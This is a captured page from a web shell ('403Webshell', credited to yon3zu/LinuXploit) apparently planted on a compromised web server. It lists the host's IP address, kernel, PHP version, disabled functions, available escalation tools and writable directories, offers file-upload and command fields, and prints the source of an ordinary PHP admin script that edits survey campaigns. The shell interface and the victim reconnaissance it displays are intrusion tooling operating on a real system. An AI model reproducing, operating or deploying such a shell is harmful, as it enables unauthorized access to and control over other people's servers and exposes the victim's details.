403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/survey_demo/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/survey_demo/webadmin/campaign_modify.php
<?php
	require_once('check_login.php');
	require_once("function_cropimg.php");
	require_once("mime_type_lib.php");

	$id = (int)$_POST["id"];

	$message = "";

	foreach ($arraylangcode as $langcode => $langname) {
		if(empty($_POST["name_".$langcode])){
			$message .= "Please enter name [" . $langname . "].\\n\\n";
		}
	}

	if(empty($_POST["user_login"])){
		$message .= "Please select user login.\\n\\n";
	}else{
		if($_POST["user_login"] == "REQUEST_LOGIN"){


		}else{

		}
	}

	if (empty($_POST["start_date"])) {
		$message .= "Please enter start date.\\n\\n";
	}

	if (empty($_POST["end_date"])) {
		$message .= "Please enter end date.\\n\\n";
	}

	if (!empty($_POST["start_date"]) && !empty($_POST["end_date"])) {

		if (!validateDate($_POST["start_date"], 'Y-m-d')) {
			$message .= "Start date format is wrong.\\n\\n";
		}

		if (!validateDate($_POST["end_date"], 'Y-m-d')) {
			$message .= "End date format is wrong.\\n\\n";
		}

		if (validateDate($_POST["start_date"], 'Y-m-d') && validateDate($_POST["end_date"], 'Y-m-d')) {
			if ($_POST["start_date"] > $_POST["end_date"]) {
				$message .= "Start date should be earlier than end date.\\n\\n";
			}
		}
	}

	if(!empty($message)){
		echo "<script>alert('".$message."'); history.back();</script>";
		exit;
	}

	// Upload slide img
	$background_img = "";
	$filelimit = 2 * 1048576; //Filelimit in 2MB
	if ($_FILES["background_img"]['name'] <> '') {
		if ($_FILES["background_img"]['size'] < $filelimit) {

			//check if image type is valid or not
			$mime = get_file_mime_type($_FILES["background_img"]['name']);

			if (($mime == "image/gif") || ($mime == "image/jpeg") || ($mime == "image/png")) {

				//check file resolution
				if(!check_image_resolution($_FILES["background_img"]['tmp_name'])){
					echo '<script language="javascript">
				alert("The resolution of this image is too large. Please resize it before uploading to server.");
				history.back();
			</script>';
					exit;
				}

				$filename = $_FILES["background_img"]['name'];
				preg_match("/\.([^\.]+)$/", $filename, $file_ext);
				$newfilename = random_string() . "." . $file_ext[1]; // default length 8

				move_uploaded_file($_FILES["background_img"]['tmp_name'], "../images/" . $newfilename) or die ("Could not copy the file");

				/*$img_path = "../images/slideshow/" . $newfilename;
				if ($slidetype == 1) {
					createthumb($img_path, $img_path, 2620, 800);
				} else {
					createthumb($img_path, $img_path, 400, 170);
				}*/


				$background_img = $newfilename;

			} else {
				echo '<script language="javascript">
				alert("Files must be JPEG, GIF, or PNG and under 2MB in size");
				history.back();
			</script>';

				exit;
			}

		} else {
			echo '<script language="javascript">
				alert("Files must be JPEG, GIF, or PNG and under 2MB in size");
				history.back();
			</script>';

			exit;
		}

	} else {
		$background_img = "";
	}

	$sql        = "update campaign set user_login=?, start_date=?, end_date=?, lastupdate=?, lastupby=? where id = ?";
	$parameters = array($_POST["user_login"], $_POST["start_date"], $_POST["end_date"],$nowdate, $_SESSION['cmsloginid'], $id);
	bind_pdo($sql, $parameters);

	$sql = "update campaign set ";
	$parameters = array();
	foreach ($arraylangcode as $langcode => $langname) {
		$sql .= "name_" . $langcode . "=?, desc1_" . $langcode . "=?,desc2_" . $langcode . "=?,desc3_" . $langcode . "=?,desc4_" . $langcode . "=?,desc5_" . $langcode . "=?,";
		$parameters[] = $_POST["name_" . $langcode];
		$parameters[] = $_POST["desc1_" . $langcode];
		$parameters[] = $_POST["desc2_" . $langcode];
		$parameters[] = $_POST["desc3_" . $langcode];
		$parameters[] = $_POST["desc4_" . $langcode];
		$parameters[] = $_POST["desc5_" . $langcode];
	}

	if($_POST["delimage"] == 1 || !empty($background_img)){
		$sql .= "background_img=?,";
		$parameters[] = $background_img;
	}

	$sql = substr_replace($sql ," ",-1);

	$sql.="where id = ?";
	$parameters[] = $id;
	bind_pdo($sql, $parameters);

	header("Location: campaign_index.php?msg=2");


Youez - 2016 - github.com/yon3zu
LinuXploit